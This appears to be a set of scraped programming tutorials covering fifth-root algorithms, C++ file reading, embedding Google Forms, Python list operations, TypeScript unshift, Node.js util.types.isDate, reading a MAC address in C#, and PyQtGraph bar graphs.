[ { "code": null, "e": 24301, "s": 24273, "text": "\n19 Oct, 2021" }, { "code": null, "e": 24368, "s": 24301, "text": "Given a number, print floor of 5’th root of the number.Examples: " }, { "code": null, "e": 24514, "s": 24368, "text": "Input : n = 32\nOutput : 2\n2 raise to power 5 is 32\n\nInput : n = 250\nOutput : 3\nFifth square root of 250 is between 3 and 4\nSo floor value is 3." }, { "code": null, "e": 24676, "s": 24514, "text": "Method 1 (Simple) A simple solution is initialize result as 0, keep incrementing result while result5 is smaller than or equal to n. Finally return result – 1. " }, { "code": null, "e": 24682, "s": 24676, "text": "C++14" }, { "code": null, "e": 24687, "s": 24682, "text": "Java" }, { "code": null, "e": 24695, "s": 24687, "text": "Python3" }, { "code": null, "e": 24698, "s": 24695, "text": "C#" }, { "code": null, "e": 24702, "s": 24698, "text": "PHP" }, { "code": null, "e": 24713, "s": 24702, "text": "Javascript" }, { "code": "// A C++ program to find floor of 5th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 is // smaller than or equal to n while (res*res*res*res*res <= n) res++; // Return floor of 5'th root return res-1;} // Driver programint main(){ int n = 250; cout << \"Floor of 5'th root is \" << floorRoot5(n); return 0;}", "e": 25254, "s": 24713, "text": null }, { "code": "// Java program to find floor of 5th root class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void main(String []args) { int n = 250; System.out.println(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 25902, "s": 25254, "text": null }, { "code": "# A Python3 program to find the floor# of the 5th root # Returns floor of 5th root of ndef floorRoot5(n): # Base cases if n == 0 and n == 1: return n # Initialize result res = 0 # Keep incrementing res while res^5 # is smaller than or equal to n while res * res * res * res * res <= n: res += 1 # Return floor of 5'th root return res-1 # Driver Codeif __name__ == \"__main__\": n = 250 print(\"Floor of 5'th root is\", floorRoot5(n)) # This code is contributed by Rituraj Jain", "e": 26446, "s": 25902, "text": null }, { "code": "// C# program to find floor of 5th rootusing System; class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void Main() { int n = 250; Console.Write(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Sumit Sudhakar.", "e": 27081, "s": 26446, "text": null }, { "code": "<?php// PHP program to find// floor of 5th root // Returns floor of// 5th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Initialize result $res = 0; // Keep incrementing res while // res^5 is smaller than or // equal to n while ($res * $res * $res * $res * $res <= $n) $res++; // Return floor // of 5'th root return $res - 1;} // Driver Code $n = 250; echo \"Floor of 5'th root is \" , floorRoot5($n); // This code is contributed by nitin mittal.?>", "e": 27657, "s": 27081, "text": null }, { "code": "<script> // JavaScript program to find floor of 5th root // Returns floor of 5th root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result let res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code let n = 250; document.write(\"Floor of 5'th root is \" + floorRoot5(n)); </script>", "e": 28207, "s": 27657, "text": null }, { "code": null, "e": 28216, "s": 28207, "text": "Output: " }, { "code": null, "e": 28240, "s": 28216, "text": "Floor of 5'th root is 3" }, { "code": null, "e": 28535, "s": 28240, "text": "Time complexity of above solution is O(n1/5). We can do better. See below solution. Method 2 (Binary Search) The idea is to do Binary Search. We start from n/2 and if its 5’th power is more than n, we recur for interval from n/2+1 to n. Else if power is less, we recur for interval 0 to n/2-1 " }, { "code": null, "e": 28539, "s": 28535, "text": "C++" }, { "code": null, "e": 28544, "s": 28539, "text": "Java" }, { "code": null, "e": 28552, "s": 28544, "text": "Python3" }, { "code": null, "e": 28555, "s": 28552, "text": "C#" }, { "code": null, "e": 28559, "s": 28555, "text": "PHP" }, { "code": null, "e": 28570, "s": 28559, "text": "Javascript" }, { "code": "// A C++ program to find floor of 5'th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5'th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point and its power 5 int mid = (low + high) / 2; long int mid5 = mid*mid*mid*mid*mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } else // If mid^5 is greater than n high = mid - 1; } return ans;} // Driver programint main(){ int n = 250; cout << \"Floor of 5'th root is \" << floorRoot5(n); return 0;}", "e": 29524, "s": 28570, "text": null }, { "code": "// A Java program to find// floor of 5'th root class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void main(String []args) { int n = 250; System.out.println(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 30863, "s": 29524, "text": null }, { "code": "# A Python3 program to find the floor# of 5'th root # Returns floor of 5'th root of ndef floorRoot5(n): # Base cases if n == 0 or n == 1: return n # Do Binary Search for floor of # 5th square root low, high, ans = 1, n, 0 while low <= high: # Find the middle point and its power 5 mid = (low + high) // 2 mid5 = mid * mid * mid * mid * mid # If mid is the required root if mid5 == n: return mid # Since we need floor, we update answer # when mid5 is smaller than n, and move # closer to 5'th root if mid5 < n: low = mid + 1 ans = mid else: # If mid^5 is greater than n high = mid - 1 return ans # Driver Codeif __name__ == \"__main__\": n = 250 print(\"Floor of 5'th root is\", floorRoot5(n)) # This code is contributed by Rituraj Jain", "e": 31776, "s": 30863, "text": null }, { "code": "// A C# program to find// floor of 5'th rootusing System; class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void Main(String []args) { int n = 250; Console.WriteLine(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 33125, "s": 31776, "text": null }, { "code": "<?php// A PHP program to find floor of 5'th root // Returns floor of 5'th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Do Binary Search for floor of 5th square root $low = 1; $high = $n; $ans = 0; while ($low <= $high) { // Find the middle point and its power 5 $mid = (int)(($low + $high) / 2); $mid5 = $mid*$mid*$mid*$mid*$mid; // If mid is the required root if ($mid5 == $n) return $mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if ($mid5 < $n) { $low = $mid + 1; $ans = $mid; } else // If mid^5 is greater than n $high = $mid - 1; } return $ans;} // Driver code $n = 250; echo \"Floor of 5'th root is \".floorRoot5($n); // This code is contributed by mits?>", "e": 34068, "s": 33125, "text": null }, { "code": "<script> // A javascript program to find// floor of 5'th root // Returns floor of 5'th// root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root var low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 var mid = parseInt((low + high) / 2); var mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans;} // Driver Codevar n = 250;document.write(\"Floor of 5'th root is \" + floorRoot5(n)); // This code contributed by Princi Singh </script>", "e": 35152, "s": 34068, "text": null }, { "code": null, "e": 35161, "s": 35152, "text": "Output: " }, { "code": null, "e": 35185, "s": 35161, "text": "Floor of 5'th root is 3" }, { "code": null, "e": 35544, "s": 35185, "text": "Time Complexity: O(logN)Auxiliary Space: O(1) We can also use Newton Raphson Method to find exact root. See this for implementation.Source : http://qa.geeksforgeeks.org/7487/program-calculate-fifth-without-using-mathematical-operatorsPlease write comments if you find anything incorrect, or you want to share more information about the topic discussed above " }, { "code": null, "e": 35551, "s": 35544, "text": "Sam007" }, { "code": null, "e": 35567, "s": 35551, "text": "Anshul_Aggarwal" }, { "code": null, "e": 35580, "s": 35567, "text": "nitin mittal" }, { "code": null, "e": 35593, "s": 35580, "text": "rituraj_jain" }, { "code": null, "e": 35606, "s": 35593, "text": "Mithun Kumar" }, { "code": null, "e": 35621, "s": 35606, "text": "chinmoy1997pal" }, { "code": null, "e": 35634, "s": 35621, "text": "princi singh" }, { "code": null, "e": 35650, "s": 35634, "text": "pankajsharmagfg" }, { "code": null, "e": 35677, "s": 35650, "text": "ashutoshsinghgeeksforgeeks" }, { "code": null, "e": 35688, "s": 35677, "text": "Algorithms" }, { "code": null, "e": 35699, "s": 35688, "text": "Algorithms" }, { "code": null, "e": 35797, "s": 35699, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 35806, "s": 35797, "text": "Comments" }, { "code": null, "e": 35819, "s": 35806, "text": "Old Comments" }, { "code": null, "e": 35844, "s": 35819, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 35900, "s": 35844, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 35943, "s": 35900, "text": "SCAN (Elevator) Disk Scheduling Algorithms" }, { "code": null, "e": 35972, "s": 35943, "text": "Quadratic Probing in Hashing" }, { "code": null, "e": 36006, "s": 35972, "text": "K means Clustering - Introduction" }, { "code": null, "e": 36070, "s": 36006, "text": "What are Hash Functions and How to choose a good Hash Function?" }, { "code": null, "e": 36123, "s": 36070, "text": "Difference between Algorithm, Pseudocode and Program" }, { "code": null, "e": 36155, "s": 36123, "text": "FCFS Disk Scheduling Algorithms" } ]
Extracting MAC address using C#
A MAC address of a device is a media access control address. It is a unique identifier assigned to a network. The MAC address technology is used by many technologies such as Ethernet, Bluetooth, Fibre Channel, etc. Here, we will use the following method to check for all the network interfaces on the computer. NetworkInterface.GetAllNetworkInterfaces For this, the NetworkInterfaceType Enumeration is also used to specify the type of network interfaces. string addr = ""; foreach (NetworkInterface n in NetworkInterface.GetAllNetworkInterfaces()) { if (n.OperationalStatus == OperationalStatus.Up) { addr += n.GetPhysicalAddress().ToString(); break; } } return addr; Above, we have used the GetPhysicalAddress() method to extract the MAC address.
[ { "code": null, "e": 1172, "s": 1062, "text": "A MAC address of a device is a media access control address. It is a unique identifier assigned to a network." }, { "code": null, "e": 1277, "s": 1172, "text": "The MAC address technology is used by many technologies such as Ethernet, Bluetooth, Fibre Channel, etc." }, { "code": null, "e": 1373, "s": 1277, "text": "Here, we will use the following method to check for all the network interfaces on the computer." }, { "code": null, "e": 1414, "s": 1373, "text": "NetworkInterface.GetAllNetworkInterfaces" }, { "code": null, "e": 1517, "s": 1414, "text": "For this, the NetworkInterfaceType Enumeration is also used to specify the type of network interfaces." }, { "code": null, "e": 1748, "s": 1517, "text": "string addr = \"\";\nforeach (NetworkInterface n in NetworkInterface.GetAllNetworkInterfaces()) {\n if (n.OperationalStatus == OperationalStatus.Up) {\n addr += n.GetPhysicalAddress().ToString();\n break;\n }\n}\nreturn addr;" }, { "code": null, "e": 1828, "s": 1748, "text": "Above, we have used the GetPhysicalAddress() method to extract the MAC address." } ]
C++ program to read file word by word
08 May, 2019 Given a text file, extract words from it. In other words, read the content of file word by word.Example : Input: And in that dream, we were flying. Output: And in that dream, we were flying. Approach : 1) Open the file which contains string. For example, file named “file.txt” contains a string “geeks for geeks”.2) Create a filestream variable to store file content.3) Extract and print words from the file stream into a string variable via while loop. // C++ implementation to read// file word by word#include <bits/stdc++.h>using namespace std; // driver codeint main(){ // filestream variable file fstream file; string word, t, q, filename; // filename of the file filename = "file.txt"; // opening file file.open(filename.c_str()); // extracting words from the file while (file >> word) { // displaying content cout << word << endl; } return 0;} Output: geeks for geeks. imim123345667899 cpp-file-handling C++ Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 54, "s": 26, "text": "\n08 May, 2019" }, { "code": null, "e": 160, "s": 54, "text": "Given a text file, extract words from it. In other words, read the content of file word by word.Example :" }, { "code": null, "e": 246, "s": 160, "text": "Input: And in that dream, we were flying.\nOutput:\nAnd\nin\nthat\ndream,\nwe\nwere\nflying.\n" }, { "code": null, "e": 257, "s": 246, "text": "Approach :" }, { "code": null, "e": 509, "s": 257, "text": "1) Open the file which contains string. For example, file named “file.txt” contains a string “geeks for geeks”.2) Create a filestream variable to store file content.3) Extract and print words from the file stream into a string variable via while loop." }, { "code": "// C++ implementation to read// file word by word#include <bits/stdc++.h>using namespace std; // driver codeint main(){ // filestream variable file fstream file; string word, t, q, filename; // filename of the file filename = \"file.txt\"; // opening file file.open(filename.c_str()); // extracting words from the file while (file >> word) { // displaying content cout << word << endl; } return 0;}", "e": 965, "s": 509, "text": null }, { "code": null, "e": 973, "s": 965, "text": "Output:" }, { "code": null, "e": 991, "s": 973, "text": "geeks\nfor\ngeeks.\n" }, { "code": null, "e": 1008, "s": 991, "text": "imim123345667899" }, { "code": null, "e": 1026, "s": 1008, "text": "cpp-file-handling" }, { "code": null, "e": 1039, "s": 1026, "text": "C++ Programs" } ]
How to embed Google Forms on any Website ?
01 Oct, 2020 Google Forms are one of the most famous online platform developed and supported by Google. One can create and customize the created forms and can perform various tasks from review to automatic certificate generator. One can also embed it on a website so that anyone visiting the website can submit or view the form. This article will describe the method to embed a Google Form to any website. Step 1: Create a Google Form that has to be embedded. The How to Create and Customize Google Forms? article has the steps needed to create and customize Google Forms as per the requirements. Step 2: After the form has been created, click on the Send button as shown in the image below. Step 3: Select the embed option from the available options of sending. This would show an <iframe> link that has to be copied. Step 3: Add this <iframe> link in the HTML source code of the page where the form has to be embedded. This will automatically display the form and allow it to be filled on the page itself. The example below illustrates how the form has to be embedded. Example: HTML <!DOCTYPE html><html> <body> <h1 style="color: green;"> GeeksforGeeks </h1> <p> How to embed Google Forms on any website? </p> <!-- Specify the <iframe> given by the the Google Forms embed page --> <iframe src="Your Copied Form Source" width="550" height="600" frameborder="0" marginheight="0" marginwidth="0"> Loading... </iframe></body> </html> Output: The output screen will look like this How To HTML Web Technologies Web technologies Questions HTML Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 54, "s": 26, "text": "\n01 Oct, 2020" }, { "code": null, "e": 447, "s": 54, "text": "Google Forms are one of the most famous online platform developed and supported by Google. One can create and customize the created forms and can perform various tasks from review to automatic certificate generator. One can also embed it on a website so that anyone visiting the website can submit or view the form. This article will describe the method to embed a Google Form to any website." }, { "code": null, "e": 638, "s": 447, "text": "Step 1: Create a Google Form that has to be embedded. The How to Create and Customize Google Forms? article has the steps needed to create and customize Google Forms as per the requirements." }, { "code": null, "e": 733, "s": 638, "text": "Step 2: After the form has been created, click on the Send button as shown in the image below." }, { "code": null, "e": 860, "s": 733, "text": "Step 3: Select the embed option from the available options of sending. This would show an <iframe> link that has to be copied." }, { "code": null, "e": 1112, "s": 860, "text": "Step 3: Add this <iframe> link in the HTML source code of the page where the form has to be embedded. This will automatically display the form and allow it to be filled on the page itself. The example below illustrates how the form has to be embedded." }, { "code": null, "e": 1121, "s": 1112, "text": "Example:" }, { "code": null, "e": 1126, "s": 1121, "text": "HTML" }, { "code": "<!DOCTYPE html><html> <body> <h1 style=\"color: green;\"> GeeksforGeeks </h1> <p> How to embed Google Forms on any website? </p> <!-- Specify the <iframe> given by the the Google Forms embed page --> <iframe src=\"Your Copied Form Source\" width=\"550\" height=\"600\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\"> Loading... </iframe></body> </html>", "e": 1561, "s": 1126, "text": null }, { "code": null, "e": 1569, "s": 1561, "text": "Output:" }, { "code": null, "e": 1607, "s": 1569, "text": "The output screen will look like this" }, { "code": null, "e": 1614, "s": 1607, "text": "How To" }, { "code": null, "e": 1619, "s": 1614, "text": "HTML" }, { "code": null, "e": 1636, "s": 1619, "text": "Web Technologies" }, { "code": null, "e": 1663, "s": 1636, "text": "Web technologies Questions" }, { "code": null, "e": 1668, "s": 1663, "text": "HTML" } ]
Python – K Maximum elements with Index in List
01 Aug, 2020 GIven a List, extract K Maximum elements with their indices. Input : test_list = [5, 3, 1, 4, 7, 8, 2], K = 2Output : [(4, 7), (5, 8)]Explanation : 8 is maximum on index 5, 7 on 4th. Input : test_list = [5, 3, 1, 4, 7, 10, 2], K = 1Output : [(5, 10)]Explanation : 10 is maximum on index 5. Method #1 : Using sorted() + index() The combination of above functions provide a way of finding solution to this problem. In this, we initially perform sort and extract K maximum elements, then are encapsulated in tuple with their ordering in original list. Python3 # Python3 code to demonstrate working of # K Maximum elements with Index in List# Using sorted() + index() # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original list print("The original list : " + str(test_list)) # initializing KK = 3 # Using sorted() + index()# using sorted() to sort and slice K maximum elements temp = sorted(test_list)[-K:]res = []for ele in temp: # encapsulating elements with index using index() res.append((test_list.index(ele), ele)) # printing result print("K Maximum with indices : " + str(res)) The original list : [5, 3, 1, 4, 7, 8, 2] K Maximum with indices : [(0, 5), (4, 7), (5, 8)] Method #2 : Using enumerate() + itemgetter() The combination of above functions can be used to solve this problem. In this, we perform the task of getting indices using enumerate() and itemgetter() is used to get the elements. Python3 # Python3 code to demonstrate working of# K Maximum elements with Index in List# Using enumerate() + itemgetter()from operator import itemgetter # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original listprint("The original list : " + str(test_list)) # initializing KK = 3 # Using enumerate() + itemgetter()# Making index values pairs at 1st stageres = list(sorted(enumerate(test_list), key = itemgetter(1)))[-K:] # printing resultprint("K Maximum with indices : " + str(res)) The original list : [5, 3, 1, 4, 7, 8, 2] K Maximum with indices : [(0, 5), (4, 7), (5, 8)] Python list-programs Python Python Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n01 Aug, 2020" }, { "code": null, "e": 89, "s": 28, "text": "GIven a List, extract K Maximum elements with their indices." }, { "code": null, "e": 211, "s": 89, "text": "Input : test_list = [5, 3, 1, 4, 7, 8, 2], K = 2Output : [(4, 7), (5, 8)]Explanation : 8 is maximum on index 5, 7 on 4th." }, { "code": null, "e": 318, "s": 211, "text": "Input : test_list = [5, 3, 1, 4, 7, 10, 2], K = 1Output : [(5, 10)]Explanation : 10 is maximum on index 5." }, { "code": null, "e": 355, "s": 318, "text": "Method #1 : Using sorted() + index()" }, { "code": null, "e": 577, "s": 355, "text": "The combination of above functions provide a way of finding solution to this problem. In this, we initially perform sort and extract K maximum elements, then are encapsulated in tuple with their ordering in original list." }, { "code": null, "e": 585, "s": 577, "text": "Python3" }, { "code": "# Python3 code to demonstrate working of # K Maximum elements with Index in List# Using sorted() + index() # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original list print(\"The original list : \" + str(test_list)) # initializing KK = 3 # Using sorted() + index()# using sorted() to sort and slice K maximum elements temp = sorted(test_list)[-K:]res = []for ele in temp: # encapsulating elements with index using index() res.append((test_list.index(ele), ele)) # printing result print(\"K Maximum with indices : \" + str(res))", "e": 1144, "s": 585, "text": null }, { "code": null, "e": 1237, "s": 1144, "text": "The original list : [5, 3, 1, 4, 7, 8, 2]\nK Maximum with indices : [(0, 5), (4, 7), (5, 8)]\n" }, { "code": null, "e": 1282, "s": 1237, "text": "Method #2 : Using enumerate() + itemgetter()" }, { "code": null, "e": 1465, "s": 1282, "text": "The combination of above functions can be used to solve this problem. In this, we perform the task of getting indices using enumerate() and itemgetter() is used to get the elements. " }, { "code": null, "e": 1473, "s": 1465, "text": "Python3" }, { "code": "# Python3 code to demonstrate working of# K Maximum elements with Index in List# Using enumerate() + itemgetter()from operator import itemgetter # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original listprint(\"The original list : \" + str(test_list)) # initializing KK = 3 # Using enumerate() + itemgetter()# Making index values pairs at 1st stageres = list(sorted(enumerate(test_list), key = itemgetter(1)))[-K:] # printing resultprint(\"K Maximum with indices : \" + str(res))", "e": 1973, "s": 1473, "text": null }, { "code": null, "e": 2066, "s": 1973, "text": "The original list : [5, 3, 1, 4, 7, 8, 2]\nK Maximum with indices : [(0, 5), (4, 7), (5, 8)]\n" }, { "code": null, "e": 2087, "s": 2066, "text": "Python list-programs" }, { "code": null, "e": 2094, "s": 2087, "text": "Python" }, { "code": null, "e": 2110, "s": 2094, "text": "Python Programs" } ]
TypeScript | Array unshift() Method
15 Dec, 2021 The Array.unshift() is an inbuilt TypeScript function that is used to add one or more elements to the beginning of an array and returns the new length of the array. Syntax: array.unshift( element1, ..., elementN ) Parameter: This method accepts n number of similar elements. element1, ..., elementN : This parameter is the elements to add to the front of the array. Return Value: This method returns the length of the new array. Below example illustrate the String unshift() method in TypeScriptJS: Example 1: JavaScript <script> // Driver code var arr = [ 11, 89, 23, 7, 98 ]; // use of unshift() method var string= arr.unshift(11); // printing console.log( string);</script> Output: 6 Example 2: JavaScript <script> // Driver code var arr = ["G", "e", "e", "k", "s", "f", "o", "r", "g", "e", "e", "k", "s"]; var val; // use of unshift() method val = arr.unshift("f"); console.log( val ); console.log( arr );</script> Output: 14 ["f","G","e","e","k","s","f","o","r","g","e","e","k","s"] anikakapoor TypeScript JavaScript Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n15 Dec, 2021" }, { "code": null, "e": 194, "s": 28, "text": "The Array.unshift() is an inbuilt TypeScript function that is used to add one or more elements to the beginning of an array and returns the new length of the array. " }, { "code": null, "e": 202, "s": 194, "text": "Syntax:" }, { "code": null, "e": 243, "s": 202, "text": "array.unshift( element1, ..., elementN )" }, { "code": null, "e": 304, "s": 243, "text": "Parameter: This method accepts n number of similar elements." }, { "code": null, "e": 395, "s": 304, "text": "element1, ..., elementN : This parameter is the elements to add to the front of the array." }, { "code": null, "e": 529, "s": 395, "text": "Return Value: This method returns the length of the new array. Below example illustrate the String unshift() method in TypeScriptJS:" }, { "code": null, "e": 541, "s": 529, "text": "Example 1: " }, { "code": null, "e": 552, "s": 541, "text": "JavaScript" }, { "code": "<script> // Driver code var arr = [ 11, 89, 23, 7, 98 ]; // use of unshift() method var string= arr.unshift(11); // printing console.log( string);</script>", "e": 733, "s": 552, "text": null }, { "code": null, "e": 744, "s": 733, "text": " Output: " }, { "code": null, "e": 746, "s": 744, "text": "6" }, { "code": null, "e": 759, "s": 746, "text": "Example 2: " }, { "code": null, "e": 770, "s": 759, "text": "JavaScript" }, { "code": "<script> // Driver code var arr = [\"G\", \"e\", \"e\", \"k\", \"s\", \"f\", \"o\", \"r\", \"g\", \"e\", \"e\", \"k\", \"s\"]; var val; // use of unshift() method val = arr.unshift(\"f\"); console.log( val ); console.log( arr );</script>", "e": 1017, "s": 770, "text": null }, { "code": null, "e": 1028, "s": 1017, "text": " Output: " }, { "code": null, "e": 1089, "s": 1028, "text": "14\n[\"f\",\"G\",\"e\",\"e\",\"k\",\"s\",\"f\",\"o\",\"r\",\"g\",\"e\",\"e\",\"k\",\"s\"]" }, { "code": null, "e": 1103, "s": 1091, "text": "anikakapoor" }, { "code": null, "e": 1114, "s": 1103, "text": "TypeScript" }, { "code": null, "e": 1125, "s": 1114, "text": "JavaScript" }, { "code": null, "e": 1142, "s": 1125, "text": "Web Technologies" } ]
Node.js util.types.isDate() Method
08 Oct, 2021 The util.types.isDate() method is an inbuilt application programming interface of the util module which is used to check type for Date in the node.js. Syntax: util.types.isDate( value ) Parameters: This method accepts single parameter as mentioned above and described below. value: It is a required parameter of any datatype. Return Value: This returns a boolean value, TRUE if the value is a Date object, FALSE otherwise. Below examples illustrate the use of util.types.isDate() method in Node.js: Example 1: // Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Printing the returned value from// util.types.isDate() methodconsole.log(util.types.isDate(v1));console.log(util.types.isDate(v2)); Output: true false Example 2: // Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Calling util.types.isDate() methodif (util.types.isDate(v1)) console.log("The passed value is a Date.");else console.log("The passed value is not a Date"); if (util.types.isDate(v2)) console.log("The passed value is a Date.");else console.log("The passed value is not a Date"); Output: The passed value is a Date. The passed value is not a Date Note: The above program will compile and run by using the node filename.js command. Reference: https://nodejs.org/api/util.html#util_util_types_isdate_value Node.js-util-module Node.js Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n08 Oct, 2021" }, { "code": null, "e": 179, "s": 28, "text": "The util.types.isDate() method is an inbuilt application programming interface of the util module which is used to check type for Date in the node.js." }, { "code": null, "e": 187, "s": 179, "text": "Syntax:" }, { "code": null, "e": 214, "s": 187, "text": "util.types.isDate( value )" }, { "code": null, "e": 303, "s": 214, "text": "Parameters: This method accepts single parameter as mentioned above and described below." }, { "code": null, "e": 354, "s": 303, "text": "value: It is a required parameter of any datatype." }, { "code": null, "e": 451, "s": 354, "text": "Return Value: This returns a boolean value, TRUE if the value is a Date object, FALSE otherwise." }, { "code": null, "e": 527, "s": 451, "text": "Below examples illustrate the use of util.types.isDate() method in Node.js:" }, { "code": null, "e": 538, "s": 527, "text": "Example 1:" }, { "code": "// Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Printing the returned value from// util.types.isDate() methodconsole.log(util.types.isDate(v1));console.log(util.types.isDate(v2));", "e": 908, "s": 538, "text": null }, { "code": null, "e": 916, "s": 908, "text": "Output:" }, { "code": null, "e": 928, "s": 916, "text": "true\nfalse\n" }, { "code": null, "e": 939, "s": 928, "text": "Example 2:" }, { "code": "// Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Calling util.types.isDate() methodif (util.types.isDate(v1)) console.log(\"The passed value is a Date.\");else console.log(\"The passed value is not a Date\"); if (util.types.isDate(v2)) console.log(\"The passed value is a Date.\");else console.log(\"The passed value is not a Date\");", "e": 1468, "s": 939, "text": null }, { "code": null, "e": 1476, "s": 1468, "text": "Output:" }, { "code": null, "e": 1536, "s": 1476, "text": "The passed value is a Date.\nThe passed value is not a Date\n" }, { "code": null, "e": 1620, "s": 1536, "text": "Note: The above program will compile and run by using the node filename.js command." }, { "code": null, "e": 1693, "s": 1620, "text": "Reference: https://nodejs.org/api/util.html#util_util_types_isdate_value" }, { "code": null, "e": 1713, "s": 1693, "text": "Node.js-util-module" }, { "code": null, "e": 1721, "s": 1713, "text": "Node.js" }, { "code": null, "e": 1738, "s": 1721, "text": "Web Technologies" } ]
PyQtGraph – Bar Graph
05 May, 2021 In this article we will see how we can create bar graph in the PyQtGraph module. PyQtGraph is a graphics and user interface library for Python that provides functionality commonly required in designing and science applications. Its primary goals are to provide fast, interactive graphics for displaying data (plots, video, etc.) and second is to provide tools to aid in rapid application development (for example, property trees such as used in Qt Designer). A bar graph is a method for visualizing a set of data. Simple bar graphs compare data with one independent variable and can relate to a set point or range of data. Complex bar graphs compare data with two independent variables. Either type of graph can be oriented horizontally or vertically. Bar graph is created with the help of BarGraphItem class in PyQtGraph. In order to plot the bar graph in PyQtGraph we have to do the following1. Importing the PyQtgraph module2. Creating a plot window3. Create or get the plotting data i.e horizontal and vertical data4. Create a BarGraphItem object to plot the bar graph between the data5. Append the BarGraphItem object to the plot window Below is the implementation # importing pyqtgraph as pgimport pyqtgraph as pg # importing QtCore and QtGui from # the pyqtgraph modulefrom pyqtgraph.Qt import QtCore, QtGui # importing numpy as npimport numpy as np import time # creating a pyqtgraph plot windowwindow = pg.plot() # setting window geometry# left = 100, top = 100# width = 600, height = 500window.setGeometry(100, 100, 600, 500) # title for the plot windowtitle = "GeeksforGeeks PyQtGraph" # setting window title to plot windowwindow.setWindowTitle(title) # create list for y-axisy1 = [5, 5, 7, 10, 3, 8, 9, 1, 6, 2] # create horizontal list i.e x-axisx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # create pyqt5graph bar graph item# with width = 0.6# with bar colors = greenbargraph = pg.BarGraphItem(x = x, height = y1, width = 0.6, brush ='g') # add item to plot window# adding bargraph item to the windowwindow.addItem(bargraph) # main methodif __name__ == '__main__': # importing system import sys 